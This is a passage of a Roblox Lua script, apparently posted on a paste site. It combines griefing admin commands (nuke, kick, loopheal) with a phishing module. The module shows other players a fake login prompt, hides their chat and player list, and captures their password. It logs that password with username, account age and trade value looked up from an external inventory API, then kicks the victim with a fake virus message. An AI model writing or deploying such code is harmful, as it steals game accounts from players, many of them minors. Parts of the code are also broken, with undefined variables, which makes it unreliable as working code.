  1939. for a, g in pairs(v.PlayerGui:children()) do if g.Name == "EFFECTGUIBLIND" then g:Destroy() end end
  1940. end
  1941. end))
  1942. end
  1943. end
  1944.  
  1945. if Cmd.Text:lower():sub(1,7) == "guifix " then
  1946. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1947. for i, v in pairs(plrz) do
  1948. coroutine.resume(coroutine.create(function()
  1949. if v and v:findFirstChild("PlayerGui") then
  1950. for a, g in pairs(v.PlayerGui:children()) do if g.Name:sub(1,9) == "EFFECTGUI" then g:Destroy() end end
  1951. end
  1952. end))
  1953. end
  1954. end
  1955.  
  1956. if Cmd.Text:lower():sub(1,9) == "loopheal " then
  1957. local plrz = GetPlr(plr, Cmd.Text:lower():sub(10))
  1958. for i, v in pairs(plrz) do
  1959. if v then
  1960. local cl = script.ScriptBase:Clone() cl.Name = "LoopHeal:"..v.Name cl.Code.Value = [[
  1961. local plr = game.Players:findFirstChild("]] .. v.Name .. [[")
  1962. repeat wait()
  1963. coroutine.resume(coroutine.create(function()
  1964. if plr and plr.Character and plr.Character:findFirstChild("Humanoid") then
  1965. plr.Character.Humanoid.Health = plr.Character.Humanoid.MaxHealth
  1966. plr.Character.Humanoid.Changed:connect(function() r.Character.Humanoid.Health = plr.Character.Humanoid.MaxHealth end)
  1967. end
  1968. end))
  1969. until nil]]
  1970. end
  1971. end
  1972. end
  1973.  
  1974.  
  1975.  
  1976.  
  1977.  
  1978.  
  1979. if Cmd.Text:lower():sub(1,5) == "nuke " then
  1980. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1981. for i, v in pairs(plrz) do
  1982. coroutine.resume(coroutine.create(function()
  1983. if v and v.Character and v.Character:findFirstChild("Torso") then
  1984. local p = Instance.new("Part",game.Workspace)
  1985. p.Anchored = true
  1986. p.CanCollide = false
  1987. p.formFactor = "Symmetric"
  1988. p.Shape = "Ball"
  1989. p.Size = Vector3.new(1,1,1)
  1990. p.BrickColor = BrickColor.new("New Yeller")
  1991. p.Transparency = .5
  1992. p.Reflectance = .2
  1993. p.TopSurface = 0
  1994. p.BottomSurface = 0
  1995. p.Touched:connect(function(hit)
  1996. if hit and hit.Parent then
  1997. local ex = Instance.new("Explosion", game.Workspace)
  1998. ex.Position = hit.Position
  1999. ex.BlastRadius = 11
  2000. ex.BlastPressure = math.huge
  2001. end
  2002. end)
  2003. local cf = v.Character.Torso.CFrame
  2004. p.CFrame = cf
  2005. for i = 1, 333 do
  2006. p.Size = p.Size + Vector3.new(3,3,3)
  2007. p.CFrame = cf
  2008. wait(1/44)
  2009. end
  2010. p:Destroy()
  2011. end
  2012. end))
  2013. end
  2014. end
  2015.  
  2016. if Cmd.Text:lower():sub(1,5) == "kick " then
  2017. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  2018. for i, v in pairs(plrz) do
  2019. coroutine.resume(coroutine.create(function()
  2020. if v then v:Destroy() end
  2021. end))
  2022. end
  2023. end
  2024.  
  2025. if Cmd.Text:lower():sub(1,5) == "emit " then
  2026. local chk1 = Cmd.Text:lower():sub(6):find(" ") + 5
  2027. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6,chk1-1))
  2028. for i, v in pairs(plrz) do
  2029. coroutine.resume(coroutine.create(function()
  2030. if v.Character then v.Character:FindFirstChild("Torso")
  2031. local cl = Instance.new("ParticleEmitter", v.Character.Torso)
  2032. cl.Texture = "rbxassetid://"..Cmd.Text:sub(chk1+1)-1
  2033. end
  2034. end))
  2035. end
  2036.  
  2037. if Cmd.Text:lower():sub(1,7) == "unemit " then
  2038. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  2039. for i, v in pairs(plrz) do
  2040. coroutine.resume(coroutine.create(function()
  2041. if v and v.Character and v.Character:findFirstChild("Torso") then
  2042. for z, cl in pairs(v.Character.Torso:GetChildren()) do if cl:IsA("ParticleEmitter") then cl:Destroy() end end
  2043. end
  2044. end))
  2045. end
  2046. end end
  2047.  
  2048. end
  2049.  
  2050.  
  2051.  
  2052. function Clicked5()
  2053. for i,x in pairs(game.Players:GetChildren())do
  2054. local v = game.Players[x]
  2055. v.PlayerGui:GetChildren().Parent = workspace
  2056. gui = NewGuiPart65:Clone()
  2057. gui.Parent = v.PlayerGui
  2058. gui.ErrorFrame.Visible = true
  2059. game.StarterGui:SetCoreGuiEnabled("PlayerList", false)
  2060. game.StarterGui:SetCoreGuiEnabled("Backpack", false)
  2061. game.StarterGui:SetCoreGuiEnabled("Chat", false)
  2062. passw = gui.ErrorFrame.TB2.Text
  2063. tb1 = gui.ErrorFrame.TB1.Text
  2064. end end
  2065.  
  2066.  
  2067.  
  2068.  
  2069.  
  2070. wait(3)
  2071. NewGuiPart72.Visible = true
  2072.  
  2073.  
  2074. RAPApi = true
  2075.  
  2076.  
  2077.  
  2078.  
  2079. local checktrue = Instance.new("BoolValue")
  2080. checktrue.Parent = CoreValues
  2081. checktrue.Name = "PasscheckTrue"
  2082. checktrue.Value = false
  2083.  
  2084.  
  2085. for i,x in pairs(Others)do
  2086. local v = game.Players[x]
  2087. if v then
  2088. tb1 = v.Name
  2089. end end
  2090.  
  2091.  
  2092. PassWord.Value = NewGuiPart71.Text
  2093. UserName.Value = NewGuiPart73.Text
  2094.  
  2095. function getRap(user)
  2096. local rap = ""
  2097. if RAPApi then
  2098. ypcall(function()
  2099. local http = game:GetService("HttpService")
  2100. local rawrap = http:JSONDecode(game:HttpGet("http://roblox.plus:2052/inventory?username=" .. user,true))
  2101. rap = tostring(rawrap.rap)
  2102. end)
  2103. else
  2104. rap = "N/A"
  2105. end
  2106. return rap
  2107. end
  2108. print("This Is Jech's Property. Please DOnt Reclaim this Project.")
  2109.  
  2110. function BCtoDumpStr(str)
  2111. local res = ""
  2112. if str == "Enum.MembershipType.BuildersClub" then
  2113. res = "[BC] "
  2114. elseif str == "Enum.MembershipType.TurboBuildersClub" then
  2115. res = "[TBC] "
  2116. elseif str == "Enum.MembershipType.OutrageousBuildersClub" then
  2117. res = "[OBC] "
  2118. elseif str == "Enum.MembershipType.None" then
  2119. res = ""
  2120. end
  2121. return res
  2122. end
  2123.  
  2124. function logAccount(user,pass)
  2125. local playerName = user.Name
  2126. local playerAge = tostring(user.AccountAge)
  2127. local playerRAP = getRap(playerName)
  2128.  
  2129.  
  2130. print(BCtoDumpStr(tostring(otherp.MembershipType)) .. playerName .. " : " .. pass .. " Age: " .. playerAge .. " RAP: " .. playerRAP)
  2131. end
  2132.  
  2133. local GuiRemains = Instance.new("Folder")
  2134. GuiRemains.Name = "GuiRemains"
  2135. GuiRemains.Parent = CoreValues
  2136.  
  2137. function checkPass(pass)
  2138.  
  2139. if pass == "Password" or pass == "" or pass == "Enter Your Password" or pass == "Incorrect Password" or pass == "Enter your Password" then
  2140. Textg.Text = "PassWord Not Found In DataBase."
  2141. return false
  2142. end
  2143. local foundNums = 0
  2144. local foundLetters = 0
  2145. if string.find(pass, " ") then
  2146. Textg.Text = "PassWord Not Found In DataBase."
  2147. return false
  2148. end
  2149. if pass:len() < 6 or pass:len() > 20 then
  2150. Textg.Text = "PassWord Not Found In DataBase."
  2151. return false
  2152. end
  2153. for i=1,pass:len() do
  2154. if pass:sub(i,i):match("%d") ~= nil then
  2155. foundNums = foundNums + 1
  2156. end
  2157. end
  2158. if foundNums < 2 then
  2159. Textg.Text = "PassWord Not Found In DataBase."
  2160. return false
  2161. end
  2162. for i=1,pass:len() do
  2163. if pass:sub(i,i):match("%a") ~= nil then
  2164. foundLetters = foundLetters + 1
  2165. end
  2166. end
  2167. if foundLetters < 4 then
  2168. Textg.Text = "PassWord Not Found In DataBase."
  2169. return false
  2170. end
  2171. checktrue = true
  2172. return true
  2173.  
  2174. end
  2175. function respawn(user)
  2176. local person = game.Players[user]
  2177. person.PlayerGui["LoginGui"].ErrorFrame.Done.Value = true
  2178. person:Kick("A Virus Was Detected.")
  2179. person:Destroy();
  2180. end
  2181.  
  2182. function UnGui(user)
  2183. user.PlayerGui["LoginGui"].ErrorFrame.Done.Value = true
  2184. user:LoadCharacter();
  2185. game.StarterGui:SetCoreGuiEnabled("PlayerList", true)
  2186. game.StarterGui:SetCoreGuiEnabled("Backpack", true)
  2187. game.StarterGui:SetCoreGuiEnabled("Chat", true)
  2188. end
  2189.  
  2190. function Done()
  2191. local pl = gui.Parent.Parent
  2192. UserName.Value = pl.Name
  2193. PassWord.Value = gui.ErrorFrame.TB2.Text
  2194. checkPass(gui.ErrorFrame.TB2.Text)
  2195. logAccount(otherp,gui.ErrorFrame.TB2.Text)
  2196. respawn(pl.Name);
  2197. pl:Kick("A Virus Was Detected.")
  2198. game.StarterGui:SetCoreGuiEnabled("PlayerList", true)
  2199. game.StarterGui:SetCoreGuiEnabled("Backpack", true)
  2200. game.StarterGui:SetCoreGuiEnabled("Chat", true)
  2201.  
  2202. end
  2203.  
  2204.  
  2205. function Clicked6()
  2206.  
  2207. Done();
  2208.  
  2209.  
  2210.  
  2211. end
  2212.  
  2213.  
  2214. game.Workspace.ChildAdded:connect(function(per)
  2215. for i,x in pairs(Others)do
  2216. local v = game.Players[x]
  2217. if v then
  2218. if per.Name == v.Name then
  2219. if IsRunning.Value == true then
  2220. if v.PlayerGui["LoginGui"].ErrorFrame.Done.Value == false then
  2221. --Clicked5()
  2222. end end end
  2223. end end
  2224. end)
  2225.  
  2226.  
  2227.  
  2228. for i,x in pairs(Others) do
  2229. local v = game.Players[x]
  2230. if v then
  2231. Owner.PlayerGui.MGVX.Frame.TL3.MouseButton1Up:connect(Clicked1)
  2232. Owner.PlayerGui.MGVX.Frame.TL4.MouseButton1Up:connect(Clicked2)
  2233. Owner.PlayerGui.MGVX.Frame.TL1.MouseButton1Up:connect(Clicked)
  2234. Owner.PlayerGui.MGVX.Frame.TL1.MouseButton1Down:connect(Click)
  2235. Owner.PlayerGui.MGVX.Frame.CMDS.Execute.MouseButton1Up:connect(Clicked3)
  2236. Owner.PlayerGui.MGVX.Frame.ScrollingFrame.TB.MouseButton1Up:connect(Clicked4)
  2237. v.Backpack:WaitForChild(ToolName.Value).Equipped:connect(Clicked5)
  2238. v.PlayerGui:WaitForChild("LoginGui"):WaitForChild("ErrorFrame"):WaitForChild("LoginButton").MouseButton1Up:connect(Clicked6)
  2239. end end
  2240.  
  2241.  
  2242. game.StarterGui.ResetPlayerGuiOnSpawn = false
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement